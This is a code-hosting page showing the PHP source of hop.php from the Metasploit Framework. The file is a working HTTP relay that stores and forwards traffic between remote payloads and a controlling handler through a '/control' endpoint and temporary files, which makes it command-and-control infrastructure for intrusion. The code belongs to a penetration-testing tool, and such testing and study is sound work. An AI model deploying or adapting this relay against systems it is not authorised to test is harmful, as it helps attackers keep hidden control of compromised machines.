CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/data/php/hop.php
Views: 1904
1
<?php

2
$magic = 'TzGq';

3
$tempdir = sys_get_temp_dir() . "/hop" . $magic;

4
if(!is_dir($tempdir)){

5
	mkdir($tempdir); //make sure it's there

6
}

7


8
//get url

9
$url = $_SERVER["QUERY_STRING"];

10
//like /path/hop.php?/uRIcksm_lOnGidENTifIEr

11


12
//Looks for a file with a name or contents prefix, if found, send it and deletes it

13
function findSendDelete($tempdir, $prefix, $one=true){

14
	if($dh = opendir($tempdir)){

15
		while(($file = readdir($dh)) !== false){

16
			if(strpos($file, $prefix) !== 0){

17
				continue;

18
			}

19
			readfile($tempdir."/".$file);

20
			unlink($tempdir."/".$file);

21
			if($one){

22
				break;

23
			}

24
		}

25
	}

26
}

27


28
//handle control

29
if($url === "/control"){

30
	if($_SERVER['REQUEST_METHOD'] === 'POST'){

31
		//handle data for payload - save in a "down" file or the "init" file

32
		$postdata = file_get_contents("php://input");

33
		if(array_key_exists('HTTP_X_INIT', $_SERVER)){

34
			$f = fopen($tempdir."/init", "w"); //only one init file

35
		}else{

36
			$prefix = "down_" . sha1($_SERVER['HTTP_X_URLFRAG']);

37
			$f = fopen(tempnam($tempdir,$prefix), "w");

38
		}

39
		fwrite($f, $postdata);

40
		fclose($f);

41
	}else{

42
		findSendDelete($tempdir, "up_", false);

43
	}

44
}else if($_SERVER['REQUEST_METHOD'] === 'POST'){

45
	//get data

46
	$postdata = file_get_contents("php://input");

47
	//See if we should send anything down

48
	if($postdata === "RECV\x00" || $postdata === "RECV"){

49
		findSendDelete($tempdir, "down_" . sha1($url));

50
		$fname = $tempdir . "/up_recv_" . sha1($url); //Only keep one RECV poll

51
	}else{

52
		$fname = tempnam($tempdir, "up_"); //actual data gets its own filename

53
	}

54
	//find free and write new file

55
	$f = fopen($fname, "w");

56
	fwrite($f, $magic);

57
	//Little-endian pack length and data

58
	$urlen = strlen($url);

59
	fwrite($f, pack('V', $urlen));

60
	fwrite($f, $url);

61
	$postdatalen = strlen($postdata);

62
	fwrite($f, pack('V', $postdatalen));

63
	fwrite($f, $postdata);

64
	fclose($f);

65
//Initial query will be a GET and have a 12345 in it

66
}else if(strpos($url, "12345") !== FALSE){

67
	readfile($tempdir."/init");

68
}

69


70